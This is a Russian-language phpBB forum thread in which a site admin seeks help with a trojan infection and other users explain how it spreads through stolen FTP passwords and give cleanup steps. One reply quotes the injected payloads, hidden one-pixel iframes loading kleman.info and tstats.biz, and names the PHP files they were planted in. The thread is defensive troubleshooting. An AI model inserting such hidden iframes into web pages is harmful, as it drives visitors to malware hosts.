[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[crash]

AdmninsCluba писал(а):Что надо сделать чтобы найти и убить скрипт?

антивирус.

[AdmninsCluba]

антивирус.

Касперский стоит.

Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

[Палыч]

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума.

Тогда пусть хостер и скажет, где эта дырка

[rxu]

AdmninsCluba
А если не секрет, какая версия phpBB установлена?

[crash]

AdmninsCluba
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере

[AdmninsCluba]

А если не секрет, какая версия phpBB установлена?

Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

Но версия не поменялась в админ панели. Может надо обновить форум?

ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере

Локалхоста нет. Резервную копию откатываю папками.

Касперский найдет проблему в папках на компьютере или нет? Обязательно нужен Денвер?

[crash]

AdmninsCluba писал(а):Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.

AdmninsCluba писал(а):Касперский найдет проблему в папках на компьютере или нет?

на вашем компьютере он найдет все что угодно.

[AdmninsCluba]

crash писал(а):уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.

Почему я с трояном не смогу обновить версию форума?

[crash]

AdmninsCluba писал(а):Почему я с трояном не смогу обновить версию форума?

AdmninsCluba писал(а):Почистил файл - index.php. Не помогло

можете, но так с ним и останетесь

[edgar]

Сейчас эпидемия. Троян приобретается от зараженных сайтов через браузер IE, ворует пароли FTP (и не только) и заражает новые сайты.
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть

[go]

edgar писал(а):убить IE и ставить чистый и больше им не пользоваться.

зачем ставить если в последствии дается совет - более не пользоватся?
или сайтом не пользоваться?

[edgar]

go писал(а):зачем ставить

А как же при переустановке винды его не поставить? Или у вас другая ос.

Я в общем нашел, что троян убивает только файл iexplore.exe. Выявляется это и лечится утилитой HaxFix 4.41
У меня ссылка есть, но я ее не дам, так как это haxfix.exe. Подумаете еще плохое что-нибудь... Но найти не сложно.
После запуска надо выбрать 2. Run auto fix
Ну и потом, естественно все пароли сменить - фтп, аськи и т.д.

[Xpert]

Некоторые технические подробности, поскольку недавно один клиент подцепил подобного трояна...

Внедряется в
admin/index.php
login.php
index.php
includes/auth.php

Добавляет такой код:

Код: Выделить всё

<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>

Или такой

Код: Выделить всё

<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Или оба вместе

Еще его вставляют в файлы index.html в папках.

После того как был сменен пароль на FTP, проблемы исчезли.

[amelanin]

У меня такое было - подробности кидал тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0

обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.